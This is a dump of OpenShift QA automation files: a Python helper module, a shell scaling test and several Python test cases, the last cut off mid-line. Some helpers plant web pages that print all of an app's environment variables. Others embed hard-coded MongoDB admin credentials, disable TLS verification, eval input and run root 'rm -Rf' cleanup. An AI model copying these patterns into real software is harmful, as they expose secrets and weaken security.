host:\n host = OSConf.get_app_url(app_name)\n key_filename = get_default_ssh_key()\n return rcmd_get_status_output(cmd, user, host, key_filename, quiet)\n\n\ndef run_remote_cmd2(app_name, cmd, as_root=False, host=None, quiet=False):\n \"\"\"\n Using ssh client\n \"\"\"\n if as_root:\n user = 'root'\n if not host:\n host = get_instance_ip()\n key_filename = get_root_ssh_key()\n else:\n 
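# non-root path: connect as the gear user (the app UUID) with the default SSH key\n 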
user = OSConf.get_app_uuid(app_name)\n if not host:\n host = OSConf.get_app_url(app_name)\n key_filename = get_default_ssh_key()\n return rcmd_get_status_output2(cmd, user, host, key_filename, quiet)\n\n\ndef check_json_web_page(url, touples, options='-H \"Pragma:no-cache\"', delay=5, count=1):\n '''fetch a page and check JSON'''\n log.debug(\"Trying to find all the touples in %s\" % (url))\n fetch_cmd = \"curl -k -s %s '%s'\" % (options, url)\n # Retry 4 times\n retcode = 1\n for i in range(count):\n time.sleep(delay)\n (retcode, output) = command_getstatusoutput(fetch_cmd, quiet = True)\n if retcode == 0:\n json_array = json.loads(output) #get the dict\n for key in json_array:\n for touple in touples:\n if (key == touple[0] and json_array[key]==touple[1]):\n print \"Found results:\"\n return 0\n return 1\n\n\n#@exclusive\ndef restore_config():\n (user, passwd) = get_default_rhlogin()\n f = open(\"%s/libra_server-%s\"%(get_tmp_dir(), user), 'r')\n libra_ip = f.read().strip()\n libra_ip.strip()\n log.debug(\"Restoring libra server to default\")\n cmd = \"sed -i 's/libra_server=%s/libra_server=$libra_ip/g' %s\" % (libra_ip.strip(), express_conf_file)\n os.system(cmd)\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return repr(self.msg)\n\n\nclass InputError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expr -- input expression in which the error occurred\n msg -- explanation of the error\n \"\"\"\n pass\n\n\ndef check_ip_type(ip, expected_type, str=''):\n try:\n \tif expected_type == str:\n\t if type(ip) is not str:\n\t return type(str(ip)) is str\n\tif expected_type == int:\n\t if type(ip) is not int:\n\t\treturn type(int(ip)) is int\n\tif expected_type == list:\n\t if type(ip) is str:\n\t\treturn type(eval(ip)) is list\n\t else:\n\t\treturn type(ip) is list\n\tif expected_type == dict:\n\t if type(ip) is dict:\n\t\treturn type(eval(ip)) is dict\n\t else:\n\t\treturn type(ip) is dict\n except:\n\traise InputError(\"% s, expected %s, got %s\" % (str, expected_type, ip))\n\n\ndef get_work_dir():\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n return WORK_DIR\n\n\ndef get_app_tmpl_dir():\n return \"\"\n\n\ndef sleep(delay):\n time.sleep(delay)\n\n\ndef fetch_page_curl(url, options='-H \"Pragma:no-cache\" -L'):\n \"\"\"Returns (status, output) from curl\"\"\"\n fetch_cmd = \"curl -k -s %s '%s'\" % (options, url)\n return cmd_get_status_output(fetch_cmd)\n\n\ndef fetch_page(url, headers={}):\n \"\"\"Returns body of web page, otherwise None if error occured\"\"\"\n\n if not url.startswith('http'):\n url = 'http://'+url\n log.debug(\"Fetching %s\"%url)\n import httplib2\n proxy = None\n if os.getenv('http_proxy'):\n obj = re.search(r\"http://([^:]+):(\\d+)\", os.getenv('http_proxy'))\n if obj:\n proxy_host = obj.group(1)\n proxy_port = int(obj.group(2))\n\n if url.startswith('https'):\n proxy_type=httplib2.socks.PROXY_TYPE_HTTP\n else:\n proxy_type=httplib2.socks.PROXY_TYPE_HTTP_NO_TUNNEL\n\n proxy = httplib2.ProxyInfo(proxy_type=proxy_type, \n proxy_host=proxy_host, \n proxy_port=proxy_port)\n else:\n log.warning(\"Wrong format of http_proxy!\")\n\n conn = httplib2.Http(cache=None, timeout=CONNECT_TIMEOUT, proxy_info=proxy,\n disable_ssl_certificate_validation=True)\n _headers = {'Content-type': 'text/html;charset=utf-7)',\n 'User-Agent': 'Python-httplib2/7 (gzip)',\n 'Accept': '*/*',\n 'Pragma': 'no-cache' }\n if isinstance(headers, dict):\n if 
len(headers)>0:\n _headers.update(headers)\n elif isinstance(headers, str):\n obj = re.search(re.compile(\"-u\\s+['\\\"]?([^:]+):([^\\s'\\\"]+)\"), headers)\n if obj:\n _headers.update(get_auth_headers(obj.group(1), obj.group(2)))\n \n (response, content) = conn.request(uri=url, method='GET', headers=_headers)\n #print \"***>>>\"*20\n #print \"url : %s\"%url\n #print \"content : %s\"%content\n #print \"response : %s\"%response\n #print \"***<<<\"*20\n\n if response.status >= 400:\n log.warning(\"fetch_page(%s): %s\"%(url, response.reason))\n return content\n\n\ndef get_default_ssh_key():\n return get_default_ssh_key_()\n\n\ndef get_root_ssh_key():\n return get_root_ssh_key_()\n\n\ndef setup_c9_environment(node=None, user_email=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n try:\n change_node_profile(\"c9\", node=node)\n add_gearsize_capability(\"c9\", user_email)\n set_user_capability(\"allowsubaccounts\",\"true\", user_email)\n except Exception as e:\n log.error(\"%s\"%str(e))\n return 1\n\n return 0\n\n\ndef has_node_profile(profile):\n \"\"\"\n Returns True/False whether environment has at least one node with such profile\n \"\"\"\n if not is_multinode_env():\n return (profile == get_node_profile())\n else:\n for d in get_districts():\n for si in d['server_identities']:\n if si['node_profile'] == profile:\n return True\n return False\n\n\ndef is_multinode_env():\n log.info(\"MULTI NODE is not yet fully tested/supported\")\n return False\n if len(get_nodes())>1:\n return True\n return False\n\n\ndef get_facter(fact=None, node=None):\n (status, output) = run_remote_cmd_as_root(\"facter %s\"%fact, node, quiet=True)\n if status == 0:\n return output.strip()\n else:\n log.error(output)\n return status\n\n\ndef get_node_profile(server_identity=None, node=None):\n \"\"\"\n Returns True/False whether environment has at least one node with such profile\n * if server_identity==None => broker\n * node => public IP address (facter method will be used)\n * server_identity => private IP address (will be used district table from mongo)\n \"\"\"\n if not is_multinode_env():\n return get_facter(\"node_profile\")\n\n if node is not None:\n return get_facter(\"node_profile\", node)\n\n for d in get_districts():\n for si in d['server_identities']:\n if si['name'] == server_identities:\n return si['node_profile']\n return None\n\n\ndef change_node_profile(gear_size = \"small\", safe_mode=True, node=None):\n \"\"\"\n * if node==None => use the Broker\n * safe_mode => revert back if any problems...\n * if the given node is of such profile, there will be none change \n * if such profile is already in that cluster, there will none change as well\n * if node!=None\n \"\"\"\n if is_multinode_env():\n if node is None and has_node_profile(gear_size):\n log.debug(\"Don't need to change profile => env already contains such profile\")\n return 0\n else:\n if get_node_profile(node) == gear_size:\n log.debug(\"No profile change -> node[%s] has such profile[%s] already.\"%(node, gear_size))\n return 0\n\n config_file = \"/etc/openshift/resource_limits.conf\"\n config_steps = [\n \"rm -fv %s\" % ( config_file ),\n \"ln -v -s %s.%s %s\" % ( config_file, gear_size, config_file ),\n \"/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\"]\n\n ret = run_remote_cmd_as_root(\" && \".join(config_steps), host=node)[0]\n if safe_mode and ret != 0:\n log.error(\"ERROR detected => Setting default profile...\")\n config_steps = [\n \"rm -fv %s\" % ( config_file ),\n \"ln -v -s 
%s.%s %s\" % ( config_file, \"small\", config_file ),\n \"/usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\",\n \"sleep 5\"]\n\n run_remote_cmd_as_root(\" && \".join(config_steps), host=node)[0]\n\n return ret\n\n\ndef get_cgroup_threshold(uuid, controller, attribute):\n ( ret_code, ret_output ) = run_remote_cmd_as_root(\n \"cat /cgroup/all/openshift/%s/%s.%s\" % ( uuid, controller, attribute )\n )\n return int(ret_output.strip())\n\n\ndef get_lib_dir():\n return os.path.dirname(os.path.join(os.path.abspath(__file__),\"../../\"))\n\n\ndef get_etc_dir():\n return os.path.abspath(get_lib_dir() + \"/../etc\")\n\n\ndef get_domain_name(user_email=None, user_passwd=None):\n return get_domain_name_(user_email, user_passwd)\n\n\ndef isDNS(output):\n \"\"\" Returns True if the response contains notes regarding DNS issues. \"\"\"\n err_strings = [\"WARNING: We were unable to lookup your hostname\",\n \"retry # 7 - Waiting for DNS:\"]\n for st in err_strings:\n obj = re.search(st, output)\n if obj:\n return True\n\n return False\n\n\ndef is500(output):\n \"\"\"\n Function validates the given output and returns True, if contains 500 \n exit code (Internal Server Error) lines.\n \"\"\"\n err_strings = [\"Response code was 500\", \"Internal Server Error\"]\n for st in err_strings:\n obj = re.search(st, output)\n if obj:\n return True\n\n return False\n\n\ndef setup_testbed(**kwargs):\n \"\"\"\n obj is rhtest object\n\n setup a testbed for subsequent tests. There are several modes that can be \n run.\n 0. plain (no domain, no app)\n 1. basic (has a domain name, no app)\n 2. common (has a domain name, one app)\n\n \"\"\"\n klass = kwargs['klass']\n cf = klass.config\n rest = cf.rest_api\n\n if len(kwargs) == 0:\n kwargs['mode'] = 1\n\n mode = kwargs['mode']\n \n status, res = rest.domain_get()\n if status == 'OK':\n cf.domain_name = res\n status, res = rest.app_list()\n if len(res) > 0:\n # found an existing app, we are good to go.\n cf.app_name = res[0]['name']\n else:\n if mode == 2:\n cf['app_name'] = getRandomString()\n if not kwargs.has_key('app_type'):\n # make php the default\n app_type = app_types['php']\n else:\n app_type = app_types[kwarg['app_type']]\n klass.info(\"Creating an app '%s' of type '%s'...\" % (cf.app_name, app_type))\n status, res = rest.app_create(cf.app_name, app_type)\n self.info(\"xxx\", 1)\n else:\n cf['domain_name'] = getRandomString()\n self.info(\"No domain found, creating an new one '%s'...\" % cf.domain_name)\n status, res = rest.domain_create(cf.domain_name)\n return cf\n\n\ndef trigger_jenkins_build(git_repo, try_count=3, try_interval=5, quiet=False, timeout=COMMAND_TIMEOUT):\n unexpected_str_lst = [\"BUILD FAILED/CANCELLED\", \"Deployment Halted\"]\n for i in range(try_count):\n flag = True\n print \"-\" * 80\n print \"Trying to trigger jenkins build - %d\" % (i)\n print \"-\" * 80\n cmd = \"cd %s && echo '%d\\n' >> jenkins_trigger.txt && git add . 
&& git commit -amt && git push\" % (git_repo, i)\n (ret, output) = command_getstatusoutput(cmd, quiet, timeout)\n for s in unexpected_str_lst:\n if output.find(s) != -1:\n time.sleep(try_interval)\n flag = False\n break\n if flag == True:\n return True\n return False\n\n\ndef create_subdomain(sub_domain, sub_account, user=None, passwd=None):\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s'\"%sub_account\n headers += \" --user %s:%s\"%(user, passwd) \n data = \" -d id=%s \"%sub_domain\n url = \"https://%s//broker/rest/domains\"%get_instance_ip()\n cmd = \"curl %s -s -k -X POST -d nolinks=1 -d id=%s %s\"%(headers, data, url) \n return cmd_get_status_output(cmd, quiet=True)[0]\n\n\ndef get_public_key_type(key='default'):\n try:\n f = open(get_default_ssh_key_()+\".pub\", 'r')\n dump = f.read()\n f.close()\n obj = re.search(r'^(ssh-...)\\s+([\\S]+)', dump)\n if obj:\n return obj.group(1)\n except Exception as e:\n log.error(\"Unable to dump public key: %s\"%str(e))\n\n return None\n\n\ndef dump_public_key(key='default'):\n try:\n f = open(get_default_ssh_key_()+\".pub\", 'r')\n dump = f.read()\n f.close()\n obj = re.search(r'^ssh-...\\s+([\\S]+)', dump)\n if obj:\n return obj.group(1)\n except Exception as e:\n log.error(\"Unable to dump public key: %s\"%str(e))\n\n return None\n\ndef add_sshkey4sub_account(sub_account, user=None, passwd=None):\n #curl -k -X POST -H 'Accept: application/json' -H 'X-Impersonate-User: <sub_account>' --data-urlencode name=default -d type=<ssh-rsa|ssh-dss> --data-urlencode content=<public_ssh_key_value>--user <your_rhlogin>:<password> https://openshifttest.redhat.com/broker/rest/user/keys\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s' \"%sub_account\n headers += \" --user %s:%s \"%(user, passwd)\n data = \" -d nolinks=1 -d name=default -d type=ssh-rsa --data-urlencode content='%s'\"%dump_public_key()\n url = \"https://%s//broker/rest/user/keys\"%get_instance_ip()\n cmd = \"curl -s -k -X POST %s %s %s\"%(headers, data, url) \n return cmd_get_status_output(cmd, quiet=True)\n\n\ndef create_app_using_subaccount(sub_domain, sub_account, app_name, app_type, user=None, passwd=None):\n #curl -k -X POST -H 'Accept: application/json' -H 'X-Impersonate-User: <sub_account>' -d name=<app_name> -d cartridge=<cartridge_type> -d gear_profile=c9 --user <your_rhlogin>:<password> https://openshifttest.redhat.com/broker/rest/domains/<sub_domain>/applications\n if user is None:\n (user, passwd) = get_default_rhlogin()\n headers = \"-H 'Accept: application/json' -H 'X-Impersonate-User: %s' \"%sub_account\n headers += \" --user %s:%s \"%(user, passwd) \n data = \" -d nolinks=1 -d name=%s -d cartridge=%s -d gear_profile=c9 \"%(app_name, app_type)\n url = \"https://%s//broker/rest/domains/%s/applications\"%(get_instance_ip(), sub_domain)\n cmd = \"curl -s -k -X POST %s %s %s\"%(headers, data, url) \n (status, output) = cmd_get_status_output(cmd, quiet=True)\n obj = json.loads(output)\n if obj['status'] not in ('OK', 'Created', 'created'):\n status = 1\n return (status, obj)\n\n\n\ndef touch(filename):\n try:\n f = open(os.path.normpath(filename),'w')\n f.write(' ')\n f.close()\n return 0\n except:\n return 1\n\n\ndef git_commit_push_all(app_name):\n cmds = [\n \"cd %s\" % (app_name),\n \"git add .\",\n \"git commit -a -m hurray\",\n \"git push\"]\n return command_get_status(\" && \".join(cmds))\n\n\ndef 
inject_app_index_with_env(app_name, app_type):\n \"\"\"\n Create /env.[php|pl|jsp|...] page with list of environmental variables\n Runs 'git commit|push' with this change\n Returns 0 if success\n \"\"\"\n if not os.path.exists(app_name):\n raise Exception(\"App dir doesn't exist\")\n if app_type.startswith('php'):\n content = r\"\"\"<?php header(\"Content-Type: text/plain\"); \n foreach ($_ENV as $key => $val){ \n echo \"$key=$val\\n\"; \n } ?>\"\"\"\n xfile = \"php/env.php\"\n elif app_type.startswith(\"nodejs\"):\n xfile = \"server.js\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n f.close()\n new = r\"\"\"\n self.routes['/env.js'] = function(req, res) {\n var result = '';\n for (var key in process.env){\n result = result + key +'='+process.env[key] + \"\\n\";\n }\n res.send(result);\n };\"\"\"\n seek_str=r\"Routes for \"\n content = inject_string_by_re(seek_str, new, content, after=False)\n\n elif app_type.startswith(\"ruby\") or app_type.startswith(\"rack\"):\n xfile = \"config.ru\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n f.close()\n seek_str1 = \"map '/health' do\"\n seek_str2 = \"get '/' do\"\n if content.find(seek_str1) != -1:\n seek_str = seek_str1\n new = r\"\"\"\nmap '/env.rb' do\n xenv = proc do |env|\n output = \"\"\n ENV.each do|k,v|\n output += \"#{k}=#{v}\\n\"\n end\n [200, { \"Content-Type\" => \"text/html\" }, [output]]\n end\n run xenv\nend\"\"\"\n else:\n seek_str = seek_str2\n new = r\"\"\"\nget '/env.rb' do\n output = \"\"\n ENV.each do|k,v|\n output += \"#{k}=#{v}\\n\"\n end\n response_body = [200, output]\nend\n\"\"\"\n\n content = inject_string_by_re(seek_str, new, content, after=False)\n\n elif app_type.startswith(\"jboss\"):\n xfile = \"src/main/webapp/env.jsp\"\n content = \"\"\"\n <%@ page contentType=\"text/plain\" language=\"java\" import=\"java.sql.*\" %>\n <%@ page import=\"javax.naming.*\" %>\n <%@ page import=\"java.util.*\" %>\n <%@ page trimDirectiveWhitespaces=\"true\" %>\n <%\n Map envs = System.getenv();\n Set keys = envs.keySet();\n Iterator i = keys.iterator();\n while (i.hasNext()) {\n String k = (String) i.next();\n String v = (String) envs.get(k);\n out.println(k+\"=\"+v);\n }\n %>\"\"\"\n\n elif app_type.startswith(\"perl\"):\n xfile = \"perl/env.pl\"\n content = r\"\"\"#!/usr/bin/perl\nprint \"Content-type: text/plain\\r\\n\\r\\n\";\nforeach my $key (sort keys %ENV) {\n print \"$key=$ENV{$key}\\n\";\n}\"\"\"\n\n elif app_type.startswith(\"python\") or app_type.startswith(\"wsgi\"):\n xfile = \"wsgi/application\"\n f = open(os.path.join(app_name, xfile), 'r')\n content = f.read()\n seek_str = \"PATH_INFO.+/env\"\n new = \"\"\"\n elif environ['PATH_INFO'] == '/env.py':\n response_body = \"\"\n for k in os.environ.keys():\n response_body += \"%s=%s\\\\n\"%(k, os.environ[k])\n\"\"\"\n content = inject_string_by_re(seek_str, new, content, after=False)\n else:\n raise Exception(\"Unknown cartridge: %s\"%app_type)\n\n write_file(os.path.join(app_name, xfile) ,content)\n return git_commit_push_all(app_name)\n\n\ndef git_clone_app(app_name):\n git_url = OSConf.get_git_url(app_name)\n if not git_url:\n pass\n \n cmd = \"git clone %s\"% git_url\n (status, output) = cmd_get_status_output(cmd)\n return status\n\n\ndef type_to_cart(app_type):\n return ''.join(app_type.split('-')[:-1]).upper()\n\n\ndef random_variant(valid_variant_list=[]):\n if valid_variant_list == []:\n valid_variant_list = app_types.keys()\n try:\n valid_variant_list.remove('jenkins')\n except ValueError:\n pass\n return 
random.choice(valid_variant_list)\n" }, { "alpha_fraction": 0.5592654347419739, "alphanum_fraction": 0.5692821145057678, "avg_line_length": 27.227272033691406, "blob_id": "db8cd423f311df50724c3f49300403ae242dcf39", "content_id": "b6149b6197b57475f5db9e5d21b2cddc37be3e69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1198, "license_type": "no_license", "max_line_length": 70, "num_lines": 44, "path": "/automation/open/Longevity/scaling_negative/scaling_negative.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n[ -f function.sh ] || ln -s $(pwd)/../function.sh function.sh\n[ -f common_func.sh ] || ln -s $(pwd)/../common_func.sh common_func.sh\n[ -f AutoCreate.cfg ] || ln -s $(pwd)/../AutoCreate.cfg AutoCreate.cfg\n[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n. ./function.sh\ncd testdir\n#run set_running_parameter\n\n#################################################\n# $0 $app_type\n#################################################\nscaling_negative()\n{\n# app_create $1\n# rest_api scale-up $app_name\n# scale_check $app_name scale-up\n# [ $? -eq 0 ] && echo_red \"Scale-up should be failed!\" && exit\n \n run rest_api create $1\n run url_check $app_name\n run rest_api scale-up $app_name\n run scale_check $app_name scale-up\n run url_check $app_name\n\n run rest_api scale-down $app_name\n run scale_check $app_name scale-down\n run url_check $app_name\n run rest_api scale-down $app_name\n run url_check $app_name\n run app_delete $app_name\n}\n\nif [ $# -ne 1 ];then\n echo \"Please input the correct format, such as:\"\n echo \"$0 php-5.10\"\nelse\n run scaling_negative $1\nfi\n" }, { "alpha_fraction": 0.6142284274101257, "alphanum_fraction": 0.6179024577140808, "avg_line_length": 34.630950927734375, "blob_id": "5c0ab2bc59796df07ee39bb0bada73202de52271", "content_id": "35cd3f2250d0104b29b2a8a0f996b76fc5fbb81b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2994, "license_type": "no_license", "max_line_length": 148, "num_lines": 84, "path": "/automation/open/testmodules/RT/node/app_limit_per_user-normal_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import sys\nimport subprocess\nimport os\nimport string\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"Application limit per user validation on single/multiple node\"\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n try:\n self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n except:\n self.info(\"Missing OPENSHIFT_app_limit_per_user, using 3 as default\")\n self.app_limit_per_user = 3\n\n self.app_name = \"%s%s\" %(self.app_name_prefix, self.app_limit_per_user + 1)\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s*\" %self.app_name_prefix)\n common.destroy_app(self.app_name, self.user_email, self.user_passwd)\n os.system(\"rm -rf %s\" % (self.app_name))\n\nclass AppLimitPerUserNormalCreation(OpenShiftTest):\n\n def create_apps_one_by_one(self, start, end):\n for i in range(start, end + 1):\n app_name = \"%s%s\" 
%(self.app_name_prefix, i)\n ret = common.create_app(app_name, self.app_type, self.user_email, self.user_passwd)\n if ret != 0:\n print \"---BAD---\"\n break\n return ret\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create %s apps one by one according to app_limit_per_user setting\" %(self.app_limit_per_user),\n self.create_apps_one_by_one,\n function_parameters=[1, self.app_limit_per_user],\n expect_return=0,\n expect_description=\"Apps should be created successfully\"))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to create one more app to validate app_limit_per_user\",\n \"rhc app create %s %s -l %s -p '%s' %s\"\n %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_string_list=[\"already reached the application limit of\"],\n expect_description=\"No more app should be created\"))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AppLimitPerUserNormalCreation)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5213244557380676, "alphanum_fraction": 0.5306820273399353, "avg_line_length": 37.59027862548828, "blob_id": "ccbf816fc820afdd674d289cdfb39b8d4fa6c868", "content_id": "1d25d71d1efe6043d3353e3fe575182ecff9c0e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5557, "license_type": "no_license", "max_line_length": 161, "num_lines": 144, "path": "/automation/open/testmodules/RT/node/rhc_admin_check.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2031][BusinessIntegration][Mirage] oo-admin-chk [ruby]\nhttps://tcms.engineering.redhat.com/case/141104/\n\"\"\"\n\nimport os\nimport sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = \"DEV\"\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n try:\n self.app_type = self.get_variant()\n except:\n self.app_type = 'php'\n self.summary = \"[US2031][BusinessIntegration][Mirage] oo-admin-chk\"\n\n \tcommon.env_setup()\n\n def finalize(self):\n pass\n\nclass RhcAdminCheck(OpenShiftTest):\n def run_rhc_admin_check(self):\n cmd = \"oo-admin-chk\"\n return common.run_remote_cmd(None, cmd, True)\n\n def remove_apps_from_mongo(self):\n mongo_script = [\n \"use admin\",\n \"db.auth('libra', 'momo')\",\n \"use openshift_broker_dev\",\n \"u = db.user.findOne( { '_id' : '%s' } )\" % self.config.OPENSHIFT_user_email,\n \"u['apps'] = [ ]\",\n \"u['consumed_gears'] = 0\",\n \"db.user.save(u)\" \n ]\n run_steps = [\n 'echo \"%s\"' % \"\\n\".join(mongo_script),\n 'mongo' \n ]\n return common.run_remote_cmd_as_root(\" | \".join(run_steps))\n \n def finalize(self):\n self.remove_apps_from_mongo()\n for app_name in [ self.app_name, self.app_name2 ]:\n uuid = OSConf.get_app_uuid(app_name)\n 
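# Resolve the gear uuid and app URL before destroy_app() runs, because\n # OSConf drops this metadata once the app record is removed; both values\n # are still needed below to purge any leftover gear directory on the node.\n 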
app_url = OSConf.get_app_url(app_name)\n common.destroy_app(app_name)\n if uuid != 1:\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s-*\" % app_name, app_url)\n\n def test_method(self):\n self.info(\"===============================\")\n self.info(\"1. Creating an application\")\n self.info(\"===============================\")\n common.create_app(self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo=False)\n \n self.info(\"===============================\")\n self.info(\"2. oo-admin-chk\")\n self.info(\"===============================\")\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"3. Removing application directory on the node\")\n self.info(\"===============================\")\n uuid = OSConf.get_app_uuid(self.app_name)\n app_url = OSConf.get_app_url(self.app_name)\n ( ret_code, ret_output ) = common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n self.assert_true(ret_output.find(\"does not exist on any node\") != -1)\n \n self.info(\"===============================\")\n self.info(\"4. Fix the problem by removing the application from MongoDB and run oo-admin-check\")\n self.info(\"===============================\")\n self.remove_apps_from_mongo()\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"5. Create another application\")\n self.info(\"===============================\")\n common.create_app(self.app_name2, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, clone_repo=False)\n \n self.info(\"===============================\")\n self.info(\"6. Remove the application from MongoDB\")\n self.info(\"===============================\")\n self.remove_apps_from_mongo()\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n \n self.info(\"===============================\")\n self.info(\"7. Fix the problem by removing the application directory on the node\")\n self.info(\"===============================\")\n uuid = OSConf.get_app_uuid(self.app_name2)\n app_url = OSConf.get_app_url(self.app_name2)\n common.run_remote_cmd_as_root(\"rm -Rf /var/lib/openshift/%s\" % uuid, app_url)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_equal(ret_code, 0)\n self.assert_true(ret_output.find(\"Success\") != -1)\n \n self.info(\"===============================\")\n self.info(\"8. 
Configuring consumed_gears property incorrectly (Bug 816462)\")\n self.info(\"===============================\")\n common.run_remote_cmd_as_root(\"oo-admin-ctl-user -l %s --setconsumedgears 999\" % self.config.OPENSHIFT_user_email)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n \n # Everything is OK\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcAdminCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5630216002464294, "alphanum_fraction": 0.5739568471908569, "avg_line_length": 41.638038635253906, "blob_id": "89143fe6106e6d475dc60a98ce60e25838206bed", "content_id": "308df3d57691fc54c7c2a79b59e1949a135a27ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6950, "license_type": "no_license", "max_line_length": 157, "num_lines": 163, "path": "/automation/open/testmodules/RT/hot_deploy/hot_deploy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport pexpect\nimport re\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'jbossews2'\n self.info(\"WARN: Missing variant, used `%s` as default\" % (self.test_variant))\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n self.file_path = { 'jbossas' : 'src/main/webapp/index.html',\n 'python' : 'wsgi/application',\n 'ruby' : 'config.ru',\n 'php' : 'php/index.php',\n 'perl' : 'perl/index.pl',\n }\n self.file_path['jbosseap'] = self.file_path['jbossas']\n self.file_path['jbossews'] = self.file_path['jbossas']\n self.file_path['jbossews2'] = self.file_path['jbossas']\n self.file_path['ruby-1.9'] = self.file_path['ruby']\n\n self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n self.app_name = \"hotdeploy\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass HotDeploy(OpenShiftTest):\n def get_pids(self, app_name):\n pids = []\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n cmd = \"ssh %s 'ps aux | grep -i standalone'\" % (OSConf.get_ssh_url(app_name))\n elif 'jbossews' in self.app_type:\n #cmd = \"ssh %s 'ps aux | grep 'jre'\" % (OSConf.get_ssh_url(app_name))\n cmd = \"ssh %s 'ps aux | grep 'java'\" % (OSConf.get_ssh_url(app_name))\n else:\n cmd = \"ssh %s 'ps aux | grep bin/httpd'\" % (OSConf.get_ssh_url(app_name))\n child = 